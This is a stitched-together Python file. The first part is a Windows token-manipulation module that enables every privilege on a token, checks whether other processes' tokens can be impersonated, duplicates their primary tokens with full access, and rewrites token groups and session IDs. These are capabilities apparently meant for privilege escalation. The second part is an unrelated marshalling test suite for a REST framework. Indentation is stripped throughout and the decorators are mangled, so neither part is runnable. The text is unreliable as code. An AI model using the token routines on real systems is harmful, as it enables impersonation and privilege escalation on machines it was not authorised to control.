def enableAllUserRights(hToken=None):
if (hToken == None):
logging.debug('Trying to enable all User Rights on effective token...')
allUserRights = TokenManager.getAllUserRightsForEffectiveToken()
dAcess = (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY)
theTokenToMod = TokenManager.getCurrentThreadEffectiveToken(desiredAccessThread=dAcess, desiredAccessProcess=dAcess)
else:
logging.debug('Trying to enable all User Rights on chosen token...')
allUserRights = self.getAllUserRights(hToken)
theTokenToMod = hToken
if (allUserRights == None):
logging.error('Impossible to get all user rights for current effective thread')
return False
for aPrivName in allUserRights:
if (bool((allUserRights[aPrivName] & SE_PRIVILEGE_ENABLED)) == False):
status = TokenManager.adjustTokenPrivileges(theTokenToMod, aPrivName, state=SE_PRIVILEGE_ENABLED)
if (hToken == None):
TokenManager.closeHandle(theTokenToMod)
return True
def lookupPrivilegeValue(privilegeStr):
privilegeName = str(privilegeStr)
privilegeId = LUID()
try:
LookupPrivilegeValue(None, privilegeName, byref(privilegeId))
except Exception as e:
logging.error('Impossible to LookupPrivilegeValue for {0}: {1}'.format(str(privilegeName), e))
return None
return privilegeId
def adjustTokenPrivileges(hToken, privilegeStr, state=SE_PRIVILEGE_ENABLED):
privilegeName = str(privilegeStr)
privilegeId = TokenManager.lookupPrivilegeValue(privilegeStr)
if (privilegeId == None):
return False
newPriv = TOKEN_PRIVILEGES()
newPriv.PrivilegeCount = 1
newPriv.Privileges[0].Luid = privilegeId
newPriv.Privileges[0].Attributes = state
try:
AdjustTokenPrivileges(hToken, False, byref(newPriv), sizeof(newPriv), None, None)
except Exception as e:
logging.error('Impossible to AdjustTokenPrivileges for {0}: {1}'.format(str(privilegeName), e))
return False
logging.debug('Privilege {0} is {1} now on token'.format(repr(privilegeStr), state))
return True
def isRestrictedToken(hToken):
status = IsTokenRestricted(hToken)
if (status == 0):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_SUCCESS):
return False
else:
logging.error('Impossible to get restricted token status: {0}'.format(errorMessage))
return None
else:
return True
def canImpersonateToken(hToken, loggingOnError=False):
try:
ImpersonateLoggedOnUser(hToken)
except Exception as e:
m = 'Impossible to impersonate handle: {0}'.format(e)
if (loggingOnError == False):
logging.error(m)
else:
logging.debug(m)
return False
else:
try:
RevertToSelf()
except Exception as e:
logging.critical('Impossible to terminate the impersonation: {0}'.format(e))
logging.debug('Impersonation of token {0}: successful'.format(hToken))
return True
def getPrimaryTokenOfPid(pid, impersonation=True, loggingOnError=False, full=True):
tokenDetails = None
logging.debug('Getting primary token of pid {0}...'.format(pid))
pToken = TokenManager.getProcessTokenOfPid(pid, tokenAcess=MAXIMUM_ALLOWED, loggingOnError=loggingOnError)
if (pToken == None):
return None
else:
canImpersonate = None
if (impersonation == True):
canImpersonate = False
hPrimaryToken = TokenManager.getProcessTokenOfPid(pid, tokenAcess=(TOKEN_QUERY | TOKEN_DUPLICATE), loggingOnError=loggingOnError)
if (hPrimaryToken != None):
canImpersonate = TokenManager.canImpersonateToken(hPrimaryToken, loggingOnError=loggingOnError)
if (canImpersonate == True):
logging.debug('We can impersonate primary token of pid {0}'.format(pid))
else:
logging.debug('We can NOT impersonate primary token of pid {0}'.format(pid))
TokenManager.closeHandle(hPrimaryToken)
else:
pass
tokenDetails = TokenManager.extractTokenInfo(pToken, handleValue=None, handleID=None, full=full)
tokenDetails['canimpersonate'] = canImpersonate
logging.debug('Primary token of pid {0} got'.format(pid))
return tokenDetails
def getImpersonationTokenFromPrimaryTokenForPID(pid, desiredAccess=TOKEN_ALL_ACCESS, loggingOnError=True):
hTokendupe = None
hToken = TokenManager.getProcessTokenOfPid(pid, tokenAcess=TOKEN_DUPLICATE, loggingOnError=loggingOnError)
if (hToken == None):
return None
hTokendupe = TokenManager.duplicateToken(hToken, impersonationLevel=SecurityImpersonation, desiredAccess=desiredAccess, tokenType=TokenPrimary)
if (hTokendupe == None):
logging.error('Impossible to Duplicate Token from primary token of pid {0}'.format(pid))
TokenManager.closeHandle(hToken)
return None
TokenManager.closeHandle(hToken)
return hTokendupe
def getImpersonationTokenFromPrimaryTokenForCurrentProcess(desiredAccess=TOKEN_ALL_ACCESS):
hTokendupe = None
hToken = TokenManager.getCurrentProcessToken()
if (hToken == None):
return None
hTokendupe = TokenManager.duplicateToken(hToken, impersonationLevel=SecurityImpersonation, desiredAccess=desiredAccess, tokenType=TokenPrimary)
if (hTokendupe == None):
logging.error('Impossible to Duplicate Token from primary token for current process'.format(pid))
TokenManager.closeHandle(hToken)
return None
TokenManager.closeHandle(hToken)
return hTokendupe
def isEffectiveTokenInBuiltinAdministrators():
SECURITY_MAX_SID_SIZE = 68
sid = create_string_buffer(SECURITY_MAX_SID_SIZE)
size = DWORD(SECURITY_MAX_SID_SIZE)
try:
CreateWellKnownSid(WELL_KNOWN_SID_TYPE.WinBuiltinAdministratorsSid, None, byref(sid), byref(size))
except Exception as e:
logging.error('Impossible to get the Builtin Administrators Sid: {0}'.format(e))
return None
return TokenManager.checkTokenMembership(sid, None)
def isTokenInBuiltinAdministrators(hToken):
SECURITY_MAX_SID_SIZE = 68
sid = create_string_buffer(SECURITY_MAX_SID_SIZE)
size = DWORD(SECURITY_MAX_SID_SIZE)
try:
CreateWellKnownSid(WELL_KNOWN_SID_TYPE.WinBuiltinAdministratorsSid, None, byref(sid), byref(size))
except Exception as e:
logging.error('Impossible to get the Builtin Administrators Sid: {0}'.format(e))
return None
return TokenManager.checkTokenMembership(sid, hToken)
def checkTokenMembership(sid, hToken=None):
if (CHECK_TOKEN_MEMBERSHIP_EX_AVAILABLE == True):
CTMF_INCLUDE_APPCONTAINER = 1
isMember = BOOL()
try:
status = CheckTokenMembershipEx(hToken, sid, CTMF_INCLUDE_APPCONTAINER, byref(isMember))
except Exception as e:
logging.error('Impossible to CheckTokenMembershipEx(): {0}'.format(e))
help(e)
return None
if (isMember.value == True):
return True
else:
return False
else:
isMember = BOOL()
try:
CheckTokenMembership(hToken, byref(sid), byref(isMember))
except Exception as e:
logging.error('Impossible to CheckTokenMembership(): {0}'.format(e))
return None
if (isMember.value == True):
return True
else:
return False
def getCurrentThreadToken(desiredAccess=TOKEN_QUERY):
logging.debug('Getting current thread token')
openAsSelf = False
hToken = HANDLE(c_void_p((- 1)).value)
hThread = GetCurrentThread()
try:
OpenThreadToken(hThread, desiredAccess, False, byref(hToken))
except Exception as e:
logging.error('Impossible to OpenThreadToken 1: {0}'.format(e))
return None
if (hToken.value == None):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_NO_TOKEN):
logging.debug('Current thread is not impersonating. Consequently, NO impersonation token for current thread ')
else:
logging.error('Impossible to OpenThreadToken 2: {0}'.format(getLastErrorMessage()))
return None
return hToken
def getCurrentThreadEffectiveToken(desiredAccessThread=TOKEN_QUERY, desiredAccessProcess=TOKEN_QUERY):
threadToken = TokenManager.getCurrentThreadToken(desiredAccess=desiredAccessThread)
if (threadToken == None):
pToken = TokenManager.getCurrentProcessToken(desiredAccess=desiredAccessProcess)
return pToken
else:
return threadToken
def printCurrentPrimaryToken(printFull=True, printLinked=True):
print('Current primary token:')
logging.debug('Printing current primary token on stdout')
hToken = TokenManager.getCurrentProcessToken()
if (hToken == None):
print('Impossible to get primary token for current process')
return None
tokenDetails = TokenManager.extractTokenInfo(hToken)
TokenManager.printTokens({(- 1): [tokenDetails]}, printFull=printFull, printLinked=printLinked)
TokenManager.closeHandle(hToken)
return True
def printCurrentThreadToken(printFull=True, printLinked=True):
print('Current Thread token:')
logging.debug('Printing current thread token on stdout')
hToken = TokenManager.getCurrentThreadToken()
if (hToken == None):
print('Current Thread is not impersonating. Consequently, no impersonation token for current thread')
return None
tokenDetails = TokenManager.extractTokenInfo(hToken)
TokenManager.printTokens({(- 1): [tokenDetails]}, printFull=printFull, printLinked=printLinked)
TokenManager.closeHandle(hToken)
return True
def printCurrentThreadEffectiveToken(printFull=True, printLinked=True):
print('Current Thread token:')
logging.debug('Printing current thread token on stdout')
hToken = TokenManager.getCurrentThreadEffectiveToken()
if (hToken == None):
return None
TokenManager.printTokenFromHandle(hToken, printFull=printFull, printLinked=printLinked)
TokenManager.closeHandle(hToken)
return True
def printTokenFromHandle(hToken, printFull=True, printLinked=True):
tokenDetails = TokenManager.extractTokenInfo(hToken)
TokenManager.printTokens({(- 1): [tokenDetails]}, printFull=printFull, printLinked=printLinked)
def extractTokenInfo(pToken, handleValue=None, handleID=None, full=True):
tokenDetails = {}
tokenDetails['type'] = TokenManager.getTokenInformationTokenType(pToken)
if (isinstance(pToken, c_void_p) == True):
tokenDetails['token'] = pToken.value
else:
tokenDetails['token'] = pToken
if (tokenDetails['type'] == TokenPrimary):
tokenDetails['hval'] = None
tokenDetails['ihandle'] = None
else:
tokenDetails['hval'] = handleValue
tokenDetails['ihandle'] = handleID
tokenDetails['sid'] = TokenManager.getTokenSid(pToken)
tokenDetails['accountname'] = TokenManager.getTokenAccountName(pToken)
tokenDetails['intlvl'] = TokenManager.getTokenIntegrityLevelAsString(pToken)
if (full == True):
tokenDetails['owner'] = TokenManager.getTokenOwnerSid(pToken)
tokenDetails['groups'] = TokenManager.getTokenInformationTokenGroups(pToken)
tokenDetails['priv'] = TokenManager.getAllUserRights(pToken)
tokenDetails['issystem'] = TokenManager.isSystemToken(pToken)
tokenDetails['sessionID'] = TokenManager.getTokenInformationTokenSessionId(pToken)
tokenDetails['elevationtype'] = TokenManager.getTokenInformationTokenElevationType(pToken)
tokenDetails['iselevated'] = TokenManager.getTokenInformationTokenElevation(pToken)
if (tokenDetails['type'] == TokenPrimary):
if (full == True):
if (tokenDetails['elevationtype'] == TokenElevationTypeLimited):
tokenDetails['linkedtoken'] = TokenManager.getTokenInformationTokenLinkedToken(pToken)
else:
tokenDetails['linkedtoken'] = None
else:
tokenDetails['linkedtoken'] = None
tokenDetails['implevel'] = TokenManager.getTokenInformationTokenImpersonationLevel(pToken)
if (full == True):
if (tokenDetails['type'] == TokenPrimary):
tokenDetails['tokensource'] = TokenManager.getTokenSourceName(pToken)
else:
tokenDetails['tokensource'] = None
if (full == True):
tokenDetails['appcontainertoken'] = TokenManager.isAppContainerToken(pToken)
tokenDetails['appcontainersid'] = TokenManager.getTokenInformationAppContainerSid(pToken)
tokenDetails['appcontainernumber'] = TokenManager.getTokenInformationTokenAppContainerNumber(pToken)
tokenDetails['primarysidgroup'] = TokenManager.getTokenPrimaryGroupSID(pToken)
tokenDetails['isrestricted'] = TokenManager.isRestrictedToken(pToken)
tokenDetails['hasrestricitions'] = TokenManager.isTokenHasRestrictions(pToken)
tokenDetails['defaultdacl'] = TokenManager.getTokenDefaultDacl(pToken)
tokenDetails['logonsid'] = TokenManager.getTokenInformationTokenLogonSid(pToken)
tokenDetails['mandatorypolicy'] = TokenManager.getTokenInformationTokenMandatoryPolicy(pToken)
return tokenDetails
def filterTokens(self, allTokens, targetPIDs=None, sid=None, intLevel=None, canImpersonate=True):
interestingTokenInfo = {}
if (targetPIDs == None):
targetPIDs = allTokens.keys()
for aPID in allTokens:
if (aPID in targetPIDs):
for aTokenInfo in allTokens[aPID]:
okSID = None
okIntLevel = None
okCanImpersonate = None
if (sid != None):
if (aTokenInfo['sid'] == sid):
okSID = True
else:
okSID = False
if (intLevel != None):
if (aTokenInfo['intlevel'] == intLevel):
okIntLevel = True
else:
okIntLevel = False
if (canImpersonate != None):
if (aTokenInfo['canimpersonate'] == canImpersonate):
okCanImpersonate = True
else:
okCanImpersonate = False
if ((okSID in [True, None]) and (okIntLevel in [True, None]) and (okCanImpersonate in [True, None])):
if (aPID in interestingTokenInfo):
interestingTokenInfo[aPID].append(aTokenInfo)
else:
interestingTokenInfo[aPID] = [aTokenInfo]
logging.debug('A token found according to your criteria (pid {0}): {1}'.format(aPID, aTokenInfo))
return interestingTokenInfo
def printThisToken(allTokens, pid, iHandle=None):
if (pid not in allTokens):
return None
for aToken in allTokens[pid]:
if (aToken['ihandle'] == iHandle):
TokenManager.printTokens({pid: [aToken]})
return True
return False
def printTokens(allTokens, printFull=True, printLinked=False, initialTab=' ', tab=' '):
logging.debug('Printing all tokens in the dict...')
if ((allTokens == None) or (allTokens == {})):
logging.warning('Nothing to print. Dict is empty')
return False
for aPID in allTokens:
if (initialTab == tab):
print('- PID: {0}'.format(aPID))
for aTokenInfo in allTokens[aPID]:
if (initialTab == tab):
print(('-' * 30))
print((tab + '- PID: {0}'.format(aPID)))
for aKey in aTokenInfo:
if (aKey == 'type'):
print((tab + '- {0}: {1} ({2})'.format(aKey, TOKEN_TYPE_DICT[aTokenInfo[aKey]], aTokenInfo[aKey])))
elif (aKey == 'elevationtype'):
print((tab + '- {0}: {1} ({2})'.format(aKey, TOKEN_ELEVATION_TYPE_DICT[aTokenInfo[aKey]], aTokenInfo[aKey])))
elif (aKey == 'implevel'):
print((tab + '- {0}: {1} ({2})'.format(aKey, SECURITY_IMPERSONATION_LEVEL_DICT[aTokenInfo[aKey]], aTokenInfo[aKey])))
elif (aKey == 'priv'):
if (printFull == True):
print((tab + '- Privileges (User Rights):'))
for aPriv in aTokenInfo[aKey]:
if (aTokenInfo[aKey][aPriv] & SE_PRIVILEGE_ENABLED):
print(((tab + tab) + '- {0}: Enabled'.format(aPriv)))
elif (aTokenInfo[aKey][aPriv] & SE_PRIVILEGE_ENABLED_BY_DEFAULT):
print(((tab + tab) + '- {0}: Enabled by default'.format(aPriv)))
else:
print(((tab + tab) + '- {0}: Disabled'.format(aPriv)))
elif (aKey == 'groups'):
if (printFull == True):
print((tab + '- Groups:'))
for aGroup in aTokenInfo[aKey]:
groupSIDstr = TokenManager.convertSidToStringSid(aGroup.Sid)
nameInfo = getNameFromSid(aGroup.Sid)
flagStrings = []
isEnable = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_ENABLED))
isEnableByDefault = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_ENABLED_BY_DEFAULT))
isIntegrity = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_INTEGRITY))
isIntegrityEnable = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_INTEGRITY_ENABLED))
isLogonId = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_LOGON_ID))
isOwner = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_OWNER))
isResource = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_RESOURCE))
isUseForDenyOnly = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_USE_FOR_DENY_ONLY))
isMandatory = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_MANDATORY))
if (isEnable == True):
flagStrings.append('ENABLED')
if (isEnableByDefault == True):
flagStrings.append('ENABLED_BY_DEFAULT')
if (isIntegrityEnable == True):
flagStrings.append('INTEGRITY_ENABLED')
if (isLogonId == True):
flagStrings.append('LOGON_ID')
if (isOwner == True):
flagStrings.append('OWNER')
if (isResource == True):
flagStrings.append('RESOURCE')
if (isUseForDenyOnly == True):
flagStrings.append('USE_FOR_DENY_ONLY')
if (isMandatory == True):
flagStrings.append('MANDATORY')
if (isIntegrity == True):
flagStrings.append('INTEGRITY')
print(((tab + tab) + '- {0}: {1} ({2})'.format(groupSIDstr, nameInfo, ', '.join(flagStrings))))
elif ((aKey == 'linkedtoken') and (printLinked == True)):
if (aTokenInfo[aKey] != None):
print((tab + '- Linked Token:'))
linkedTokenDetauls = TokenManager.extractTokenInfo(aTokenInfo[aKey])
firstTokenLinked = {aPID: [linkedTokenDetauls]}
TokenManager.printTokens(allTokens=firstTokenLinked, printFull=printFull, tab=(tab * 3), printLinked=False)
else:
print((tab + '- Linked Token: None'))
elif (aKey == 'defaultdacl'):
if (printFull == True):
print((tab + '- Default DACL:'))
for anACE in aTokenInfo[aKey]:
print(((tab + tab) + '- {0}'.format(anACE)))
elif (aKey == 'mandatorypolicy'):
if (aTokenInfo[aKey] == None):
print((tab + '- Mandatory Policy: {0}'.format('N/A')))
elif (aTokenInfo[aKey] == TOKEN_MANDATORY_POLICY_OFF):
print((tab + '- Mandatory Policy: {0}'.format('OFF')))
elif (aTokenInfo[aKey] == TOKEN_MANDATORY_POLICY_NO_WRITE_UP):
print((tab + '- Mandatory Policy: {0}'.format('NO_WRITE_UP')))
elif (aTokenInfo[aKey] == TOKEN_MANDATORY_POLICY_NEW_PROCESS_MIN):
print((tab + '- Mandatory Policy: {0}'.format('NEW_PROCESS_MIN')))
elif (aTokenInfo[aKey] == TOKEN_MANDATORY_POLICY_VALID_MASK):
print((tab + '- Mandatory Policy: {0}'.format('VALID_MASK')))
else:
print((tab + '- {0}: {1}'.format(aKey, aTokenInfo[aKey])))
return True
def closeAllHandles(allTokens):
logging.debug('Closing all handles to tokens...')
for aPID in allTokens:
for aTokenInfo in allTokens[aPID]:
TokenManager.closeHandle(aTokenInfo['token'])
logging.debug('All handles to tokens are closed')
return True
def setTokenGroups(hToken, groups):
logging.debug('Trying to Adjust Token Groups according to {0}'.format(groups))
returnLength = DWORD()
sids = list(groups.keys())
if (groups == 0):
logging.warning("'Groups' given to setTokenGroups() is empty. Nothing to do")
return False
newStateGroups = tokenGroups(len(groups))()
newStateGroups.GroupCount = len(groups)
for i in range(newStateGroups.GroupCount):
aSIDstr = sids[i]
attrSid = groups[aSIDstr]
sidObject = PVOID()
status = ConvertStringSidToSidA(aSIDstr.encode(), pointer(sidObject))
newStateGroups.Groups[i].Sid = sidObject
newStateGroups.Groups[i].Attributes = attrSid
status = AdjustTokenGroups(hToken, False, byref(newStateGroups), 0, None, None)
if (status == 0):
logging.error('Impossible AdjustTokenGroups: {0}'.format(getLastErrorMessage()))
return False
logging.debug('AdjustTokenGroups() status good')
return True
def setTokenSession(hToken, sessionID):
newSessionID = DWORD(sessionID)
status = SetTokenInformation(hToken, TokenSessionId, byref(newSessionID), sizeof(DWORD))
if (status == 0):
logging.error('Impossible to set session ID of the token {0} to {1}: {2}'.format(hToken, sessionID, getLastErrorMessage()))
return False
else:
logging.debug('Session ID of the token {0} has been set to {1}'.format(hToken, sessionID))
return True |
class MarshallingTest(object):
def test_marshal(self):
model = OrderedDict([('foo', fields.Raw)])
marshal_dict = OrderedDict([('foo', 'bar'), ('bat', 'baz')])
output = marshal(marshal_dict, model)
assert isinstance(output, dict)
assert (not isinstance(output, OrderedDict))
assert (output == {'foo': 'bar'})
def test_marshal_wildcard_nested(self):
nest = fields.Nested(OrderedDict([('thumbnail', fields.String), ('video', fields.String)]))
wild = fields.Wildcard(nest)
wildcard_fields = OrderedDict([('*', wild)])
model = OrderedDict([('preview', fields.Nested(wildcard_fields))])
sub_dict = OrderedDict([('9:16', {'thumbnail': 24, 'video': 12}), ('16:9', {'thumbnail': 25, 'video': 11}), ('1:1', {'thumbnail': 26, 'video': 10})])
marshal_dict = OrderedDict([('preview', sub_dict)])
output = marshal(marshal_dict, model)
assert (output == {'preview': {'1:1': {'thumbnail': '26', 'video': '10'}, '16:9': {'thumbnail': '25', 'video': '11'}, '9:16': {'thumbnail': '24', 'video': '12'}}})
def test_marshal_wildcard_list(self):
wild = fields.Wildcard(fields.List(fields.String))
wildcard_fields = OrderedDict([('*', wild)])
model = OrderedDict([('preview', fields.Nested(wildcard_fields))])
sub_dict = OrderedDict([('1:1', [1, 2, 3]), ('16:9', [4, 5, 6]), ('9:16', [7, 8, 9])])
marshal_dict = OrderedDict([('preview', sub_dict)])
output = marshal(marshal_dict, model)
assert (output == {'preview': {'9:16': ['7', '8', '9'], '16:9': ['4', '5', '6'], '1:1': ['1', '2', '3']}})
def test_marshal_with_envelope(self):
model = OrderedDict([('foo', fields.Raw)])
marshal_dict = OrderedDict([('foo', 'bar'), ('bat', 'baz')])
output = marshal(marshal_dict, model, envelope='hey')
assert (output == {'hey': {'foo': 'bar'}})
def test_marshal_wildcard_with_envelope(self):
wild = fields.Wildcard(fields.String)
model = OrderedDict([('foo', fields.Raw), ('*', wild)])
marshal_dict = OrderedDict([('foo', {'bat': 'baz'}), ('a', 'toto'), ('b', 'tata')])
output = marshal(marshal_dict, model, envelope='hey')
assert (output == {'hey': {'a': 'toto', 'b': 'tata', 'foo': {'bat': 'baz'}}})
def test_marshal_with_skip_none(self):
model = OrderedDict([('foo', fields.Raw), ('bat', fields.Raw), ('qux', fields.Raw)])
marshal_dict = OrderedDict([('foo', 'bar'), ('bat', None)])
output = marshal(marshal_dict, model, skip_none=True)
assert (output == {'foo': 'bar'})
def test_marshal_wildcard_with_skip_none(self):
wild = fields.Wildcard(fields.String)
model = OrderedDict([('foo', fields.Raw), ('*', wild)])
marshal_dict = OrderedDict([('foo', None), ('bat', None), ('baz', 'biz'), ('bar', None)])
output = marshal(marshal_dict, model, skip_none=True)
assert (output == {'baz': 'biz'})
def test_marshal_decorator(self):
model = OrderedDict([('foo', fields.Raw)])
_with(model)
def try_me():
return OrderedDict([('foo', 'bar'), ('bat', 'baz')])
assert (try_me() == {'foo': 'bar'})
def test_marshal_decorator_with_envelope(self):
model = OrderedDict([('foo', fields.Raw)])
_with(model, envelope='hey')
def try_me():
return OrderedDict([('foo', 'bar'), ('bat', 'baz')])
assert (try_me() == {'hey': {'foo': 'bar'}})
def test_marshal_decorator_with_skip_none(self):
model = OrderedDict([('foo', fields.Raw), ('bat', fields.Raw), ('qux', fields.Raw)])
_with(model, skip_none=True)
def try_me():
return OrderedDict([('foo', 'bar'), ('bat', None)])
assert (try_me() == {'foo': 'bar'})
def test_marshal_decorator_tuple(self):
model = OrderedDict([('foo', fields.Raw)])
_with(model)
def try_me():
headers = {'X-test': 123}
return (OrderedDict([('foo', 'bar'), ('bat', 'baz')]), 200, headers)
assert (try_me() == ({'foo': 'bar'}, 200, {'X-test': 123}))
def test_marshal_decorator_tuple_with_envelope(self):
model = OrderedDict([('foo', fields.Raw)])
_with(model, envelope='hey')
def try_me():
headers = {'X-test': 123}
return (OrderedDict([('foo', 'bar'), ('bat', 'baz')]), 200, headers)
assert (try_me() == ({'hey': {'foo': 'bar'}}, 200, {'X-test': 123}))
def test_marshal_decorator_tuple_with_skip_none(self):
model = OrderedDict([('foo', fields.Raw), ('bat', fields.Raw), ('qux', fields.Raw)])
_with(model, skip_none=True)
def try_me():
headers = {'X-test': 123}
return (OrderedDict([('foo', 'bar'), ('bat', None)]), 200, headers)
assert (try_me() == ({'foo': 'bar'}, 200, {'X-test': 123}))
def test_marshal_field_decorator(self):
model = fields.Raw
_with_field(model)
def try_me():
return 'foo'
assert (try_me() == 'foo')
def test_marshal_field_decorator_tuple(self):
model = fields.Raw
_with_field(model)
def try_me():
return ('foo', 200, {'X-test': 123})
assert (try_me() == ('foo', 200, {'X-test': 123}))
def test_marshal_field(self):
model = OrderedDict({'foo': fields.Raw()})
marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz')])
output = marshal(marshal_fields, model)
assert (output == {'foo': 'bar'})
def test_marshal_tuple(self):
model = OrderedDict({'foo': fields.Raw})
marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz')])
output = marshal((marshal_fields,), model)
assert (output == [{'foo': 'bar'}])
def test_marshal_tuple_with_envelope(self):
model = OrderedDict({'foo': fields.Raw})
marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz')])
output = marshal((marshal_fields,), model, envelope='hey')
assert (output == {'hey': [{'foo': 'bar'}]})
def test_marshal_tuple_with_skip_none(self):
model = OrderedDict([('foo', fields.Raw), ('bat', fields.Raw), ('qux', fields.Raw)])
marshal_fields = OrderedDict([('foo', 'bar'), ('bat', None)])
output = marshal((marshal_fields,), model, skip_none=True)
assert (output == [{'foo': 'bar'}])
def test_marshal_nested(self):
model = {'foo': fields.Raw, 'fee': fields.Nested({'fye': fields.String})}
marshal_fields = {'foo': 'bar', 'bat': 'baz', 'fee': {'fye': 'fum'}}
expected = {'foo': 'bar', 'fee': {'fye': 'fum'}}
output = marshal(marshal_fields, model)
assert (output == expected)
def test_marshal_ordered(self):
model = OrderedDict([('foo', fields.Raw), ('baz', fields.Raw), ('bar', fields.Raw)])
marshal_fields = {'foo': 1, 'baz': 2, 'bar': 3}
expected_ordered = OrderedDict([('foo', 1), ('baz', 2), ('bar', 3)])
ordered_output = marshal(marshal_fields, model, ordered=True)
assert (ordered_output == expected_ordered)
unordered_output = marshal(marshal_fields, model)
assert (not isinstance(unordered_output, OrderedDict))
def test_marshal_nested_ordered(self):
model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested({'fye': fields.String}))])
marshal_fields = {'foo': 'bar', 'bat': 'baz', 'fee': {'fye': 'fum'}}
expected = OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('fye', 'fum')]))])
output = marshal(marshal_fields, model, ordered=True)
assert isinstance(output, OrderedDict)
assert (output == expected)
assert isinstance(output['fee'], OrderedDict)
def test_marshal_nested_with_non_null(self):
model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String)]), allow_null=False))])
marshal_fields = [OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', None)])]
output = marshal(marshal_fields, model)
expected = [OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('fye', None), ('blah', None)]))])]
assert (output == expected)
def test_marshal_nested_with_null(self):
model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String)]), allow_null=True))])
marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', None)])
output = marshal(marshal_fields, model)
expected = OrderedDict([('foo', 'bar'), ('fee', None)])
assert (output == expected)
def test_marshal_nested_with_skip_none(self):
model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String)]), skip_none=True))])
marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', None)])
output = marshal(marshal_fields, model, skip_none=True)
expected = OrderedDict([('foo', 'bar')])
assert (output == expected)
def test_allow_null_presents_data(self):
model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String)]), allow_null=True))])
marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', {'blah': 'cool'})])
output = marshal(marshal_fields, model)
expected = OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('fye', None), ('blah', 'cool')]))])
assert (output == expected)
def test_skip_none_presents_data(self):
model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String), ('foe', fields.String)]), skip_none=True))])
marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', {'blah': 'cool', 'foe': None})])
output = marshal(marshal_fields, model)
expected = OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('blah', 'cool')]))])
assert (output == expected)
def test_marshal_nested_property(self):
class TestObject(object):
def fee(self):
return {'blah': 'cool'}
model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String)]), allow_null=True))])
obj = TestObject()
obj.foo = 'bar'
obj.bat = 'baz'
output = marshal([obj], model)
expected = [OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('fye', None), ('blah', 'cool')]))])]
assert (output == expected)
def test_marshal_nested_property_with_skip_none(self):
class TestObject(object):
def fee(self):
return {'blah': 'cool', 'foe': None}
model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String), ('foe', fields.String)]), skip_none=True))])
obj = TestObject()
obj.foo = 'bar'
obj.bat = 'baz'
output = marshal([obj], model)
expected = [OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('blah', 'cool')]))])]
assert (output == expected)
def test_marshal_list(self):
model = OrderedDict([('foo', fields.Raw), ('fee', fields.List(fields.String))])
marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', ['fye', 'fum'])])
output = marshal(marshal_fields, model)
expected = OrderedDict([('foo', 'bar'), ('fee', ['fye', 'fum'])])
assert (output == expected)
def test_marshal_list_of_nesteds(self):
model = OrderedDict([('foo', fields.Raw), ('fee', fields.List(fields.Nested({'fye': fields.String})))])
marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', {'fye': 'fum'})])
output = marshal(marshal_fields, model)
expected = OrderedDict([('foo', 'bar'), ('fee', [OrderedDict([('fye', 'fum')])])])
assert (output == expected)
def test_marshal_list_of_lists(self):
model = OrderedDict([('foo', fields.Raw), ('fee', fields.List(fields.List(fields.String)))])
marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', [['fye'], ['fum']])])
output = marshal(marshal_fields, model)
expected = OrderedDict([('foo', 'bar'), ('fee', [['fye'], ['fum']])])
assert (output == expected)
def test_marshal_nested_dict(self):
model = OrderedDict([('foo', fields.Raw), ('bar', OrderedDict([('a', fields.Raw), ('b', fields.Raw)]))])
marshal_fields = OrderedDict([('foo', 'foo-val'), ('bar', 'bar-val'), ('bat', 'bat-val'), ('a', 1), ('b', 2), ('c', 3)])
output = marshal(marshal_fields, model)
expected = OrderedDict([('foo', 'foo-val'), ('bar', OrderedDict([('a', 1), ('b', 2)]))])
assert (output == expected)
.options(debug=True)
def test_will_prettyprint_json_in_debug_mode(self, app, client):
api = Api(app)
class Foo1(Resource):
def get(self):
return {'foo': 'bar', 'baz': 'asdf'}
api.add_resource(Foo1, '/foo', endpoint='bar')
foo = client.get('/foo')
lines = foo.data.splitlines()
lines = [line.decode() for line in lines]
assert ('{' == lines[0])
assert lines[1].startswith(' ')
assert lines[2].startswith(' ')
assert ('}' == lines[3])
assert foo.data.endswith(b'\n')
def test_json_float_marshalled(self, app, client):
api = Api(app)
class FooResource(Resource):
fields = {'foo': fields.Float}
def get(self):
return marshal({'foo': 3.0}, self.fields)
